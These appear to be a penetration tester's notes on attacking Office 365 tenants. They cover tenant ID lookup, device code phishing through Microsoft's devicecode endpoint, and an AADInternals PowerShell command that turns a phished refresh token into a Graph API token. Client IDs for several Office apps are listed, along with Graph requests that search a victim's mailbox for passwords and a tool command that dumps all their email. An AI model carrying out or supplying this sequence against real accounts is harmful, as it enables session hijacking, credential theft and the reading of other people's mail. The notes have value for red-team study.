Microsoft Office 365 (O365)

These are part of O365:

Excel
Teams
Word
OneDrive
OneNote
Outlook
PowerPoint
Project
SharePoint

Find Tenant ID

This is needed to automated in Python. Enter domain at https://www.whatismytenantid.com/

Can then check OpenID configuration for APIs, configs, etc.

https://login.microsoftonline.com/{tenant_id}/v2.0/.well-known/openid-configuration

Device code phishing

It relies on a legitimate authentication endpoint that is capable of forwarding the user session token to an attacker. A device code can be requested through the following endpoint:

https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0

The JWT token obtained has a limited scope. Use the refresh token to extend the scope by requesting access to other O365 applications using the well-known application GUID. We simply need to extend the scope to include applications that has the right to query Graph APIs.

Open a PowerShell console:

import-module addinternals
$t = Get-AADIntAccessTokenWithRefreshToken -clientid "d3590ed6-52b3-4102-aeff-aad2292ab01c" -resource "https://graph.microsoft.com" -tenantid "" -refreshtoken "<token>" -savetocache 1 -includerefreshtoken 1
Write-Output $t

The client ID is the one from the O365 application to access. Find list of application IDs:

GET /v1.0/applications HTTP/2
Host: /graph.microsoft.com
Authorization: Bearer <token>

Microsoft 365 client application	Client ID
Teams desktop, mobile	1fec8e78-bce4-4aaf-ab1b-5451cc387264
Teams web	5e3ce6c0-2b1f-4285-8d4b-75ee78787346
Microsoft 365 web	4765445b-32c6-49b0-83e6-1d93765276ca
Microsoft 365 desktop	0ec893e0-5785-4de6-99da-4ed124e5296c
Microsoft 365 mobile	d3590ed6-52b3-4102-aeff-aad2292ab01c
Outlook desktop	d3590ed6-52b3-4102-aeff-aad2292ab01c
Outlook web	bc59ab01-8403-45c6-8796-ac3ef710b3e3
Outlook mobile	27922004-5251-4030-b22d-91ecd9a37ea4

Applications exposed by default within the Azure tenant

The newly extended token gives access to this:

GET /v1.0/me HTTP/2
Host: /graph.microsoft.com
Authorization: Bearer <new token>

Read emails remotely:

GET /v1.0/me/messages?$search="body:password" HTTP/2
Host: /graph.microsoft.com
Authorization: Bearer <new token>

See also this MsGraphFunzy (GitHub, Charles Hamilton) to dump emails through Microsoft Graph API. The output is an HTML report with all extracted information including the email attachments.

python3 graph_dump.py azure.token body:password